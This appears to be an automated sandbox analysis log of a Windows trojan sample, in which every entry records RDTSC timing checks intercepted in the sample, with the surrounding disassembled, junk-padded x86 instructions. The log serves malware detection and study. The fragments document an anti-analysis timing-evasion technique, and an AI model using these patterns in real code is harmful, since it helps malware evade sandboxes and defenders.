Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C0AED2 second address: C0AEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e ja 00007FABC90CD756h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C0AEE7 second address: C0AEEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C0B074 second address: C0B07A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C0B07A second address: C0B0A0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC9471C26h 0x00000008 jmp 00007FABC9471C36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C0B0A0 second address: C0B0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C12E12 second address: C12E1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jl 00007FABC9471C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C12E1E second address: C12E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C12E25 second address: C12E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0D9C second address: 4DD0DCA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, 3A0Ah 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FABC90CD761h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FABC90CD75Dh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0BC2 second address: 4DC0BF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FABC9471C37h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0BF0 second address: 4DC0BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0BF6 second address: 4DC0C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop edx 0x0000000d mov al, 58h 0x0000000f popad 0x00000010 mov edi, 0F967BF6h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 jmp 00007FABC9471C33h 0x0000001d mov dl, al 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 movsx edx, ax 0x00000026 movzx eax, di 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FABC9471C30h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA00F7 second address: 4DA0194 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 1CFAEE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov si, 0F9Dh 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 jmp 00007FABC90CD766h 0x00000015 mov eax, 19AB3141h 0x0000001a popad 0x0000001b push eax 0x0000001c jmp 00007FABC90CD767h 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FABC90CD766h 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov ax, 1BCDh 0x0000002e pushfd 0x0000002f jmp 00007FABC90CD75Ah 0x00000034 add eax, 3A37D4E8h 0x0000003a jmp 00007FABC90CD75Bh 0x0000003f popfd 0x00000040 popad 0x00000041 push dword ptr [ebp+04h] 0x00000044 pushad 0x00000045 mov ebx, ecx 0x00000047 popad 0x00000048 push dword ptr [ebp+0Ch] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FABC90CD75Fh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0194 second address: 4DA0198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0198 second address: 4DA019E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA019E second address: 4DA01AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA01F0 second address: 4DA01F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA01F4 second address: 4DA01FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA01FA second address: 4DA020B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC09D5 second address: 4DC09E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC09E7 second address: 4DC0A17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FABC90CD766h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0A17 second address: 4DC0A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0A1B second address: 4DC0A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0A1F second address: 4DC0A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0453 second address: 4DC0459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0459 second address: 4DC045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC045E second address: 4DC0464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0464 second address: 4DC04F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov si, 4ACDh 0x00000011 mov edi, esi 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FABC9471C2Fh 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FABC9471C36h 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FABC9471C2Eh 0x00000029 jmp 00007FABC9471C35h 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 pushfd 0x00000032 jmp 00007FABC9471C2Eh 0x00000037 adc si, 27D8h 0x0000003c jmp 00007FABC9471C2Bh 0x00000041 popfd 0x00000042 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0EEE second address: 4DC0EF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0EF4 second address: 4DC0EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0EF8 second address: 4DC0F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0F11 second address: 4DC0F17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0F17 second address: 4DC0F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0F26 second address: 4DC0F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0F2A second address: 4DC0F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FABC90CD764h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ebx, esi 0x00000012 call 00007FABC90CD75Ah 0x00000017 pop ebx 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FABC90CD75Ch 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FABC90CD767h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE01CF second address: 4DE01EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE01EC second address: 4DE01F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE01F2 second address: 4DE01F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE01F6 second address: 4DE0233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FABC90CD764h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FABC90CD760h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bl, 02h 0x0000001d mov esi, 318F2F75h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0233 second address: 4DE0295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC9471C2Dh 0x00000009 adc eax, 37FC5886h 0x0000000f jmp 00007FABC9471C31h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edx 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007FABC9471C2Fh 0x00000026 xor ah, FFFFFFBEh 0x00000029 jmp 00007FABC9471C39h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0295 second address: 4DE029B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE029B second address: 4DE029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE029F second address: 4DE02A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE02A3 second address: 4DE02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b pushad 0x0000000c push edi 0x0000000d push esi 0x0000000e pop edx 0x0000000f pop ecx 0x00000010 mov ax, dx 0x00000013 popad 0x00000014 and dword ptr [eax+04h], 00000000h 0x00000018 pushad 0x00000019 mov ebx, 62C337E8h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE02C3 second address: 4DE0302 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FABC90CD763h 0x00000008 or si, 972Eh 0x0000000d jmp 00007FABC90CD769h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0302 second address: 4DE0306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0306 second address: 4DE030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC03DB second address: 4DC0423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov esi, 428D0F67h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov esi, 56A2845Fh 0x00000017 pushfd 0x00000018 jmp 00007FABC9471C34h 0x0000001d or ecx, 0246D8C8h 0x00000023 jmp 00007FABC9471C2Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d mov cl, DFh 0x0000002f push eax 0x00000030 push edx 0x00000031 push edi 0x00000032 pop esi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0D2E second address: 4DD0D4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FABC90CD765h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0D4E second address: 4DD0D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0D54 second address: 4DD0D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE004A second address: 4DE0050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0050 second address: 4DE0054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0054 second address: 4DE0058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0058 second address: 4DE0095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FABC90CD766h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 jmp 00007FABC90CD766h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0095 second address: 4DE009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE009B second address: 4DE009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E00688 second address: 4E006F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FABC9471C2Eh 0x00000011 add eax, 30F50238h 0x00000017 jmp 00007FABC9471C2Bh 0x0000001c popfd 0x0000001d push ecx 0x0000001e mov ch, bh 0x00000020 pop eax 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FABC9471C2Eh 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a mov edx, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e call 00007FABC9471C38h 0x00000033 pop ecx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E006F4 second address: 4E007C2 instructions: 0x00000000 rdtsc 0x00000002 mov si, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FABC90CD763h 0x00000011 and ecx, 0B7CEABEh 0x00000017 jmp 00007FABC90CD769h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FABC90CD760h 0x00000023 jmp 00007FABC90CD765h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, ecx 0x0000002b jmp 00007FABC90CD75Eh 0x00000030 push eax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FABC90CD761h 0x00000038 sbb ecx, 1A2C7106h 0x0000003e jmp 00007FABC90CD761h 0x00000043 popfd 0x00000044 popad 0x00000045 xchg eax, ecx 0x00000046 pushad 0x00000047 mov ah, 5Bh 0x00000049 mov dx, A7A8h 0x0000004d popad 0x0000004e mov eax, dword ptr [775165FCh] 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FABC90CD769h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E007C2 second address: 4E007C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E007C8 second address: 4E00831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 call 00007FABC90CD766h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test eax, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FABC90CD75Ah 0x0000001a jmp 00007FABC90CD765h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FABC90CD760h 0x00000026 and cx, B9F8h 0x0000002b jmp 00007FABC90CD75Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E00831 second address: 4E008E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FAC3BB04D3Eh 0x0000000f jmp 00007FABC9471C2Eh 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 push esi 0x00000018 movsx ebx, si 0x0000001b pop ecx 0x0000001c movsx ebx, cx 0x0000001f popad 0x00000020 xor eax, dword ptr [ebp+08h] 0x00000023 jmp 00007FABC9471C37h 0x00000028 and ecx, 1Fh 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FABC9471C34h 0x00000032 and ecx, 25FF3848h 0x00000038 jmp 00007FABC9471C2Bh 0x0000003d popfd 0x0000003e mov dx, ax 0x00000041 popad 0x00000042 ror eax, cl 0x00000044 jmp 00007FABC9471C32h 0x00000049 leave 0x0000004a pushad 0x0000004b jmp 00007FABC9471C2Dh 0x00000050 popad 0x00000051 retn 0004h 0x00000054 nop 0x00000055 mov esi, eax 0x00000057 lea eax, dword ptr [ebp-08h] 0x0000005a xor esi, dword ptr [00962014h] 0x00000060 push eax 0x00000061 push eax 0x00000062 push eax 0x00000063 lea eax, dword ptr [ebp-10h] 0x00000066 push eax 0x00000067 call 00007FABCD952514h 0x0000006c push FFFFFFFEh 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E008E6 second address: 4E008EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E008EA second address: 4E008FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E008FD second address: 4E00946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e movzx esi, bx 0x00000011 popad 0x00000012 ret 0x00000013 nop 0x00000014 push eax 0x00000015 call 00007FABCD5AE083h 0x0000001a mov edi, edi 0x0000001c jmp 00007FABC90CD75Bh 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FABC90CD760h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E00946 second address: 4E0094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E0094A second address: 4E00950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
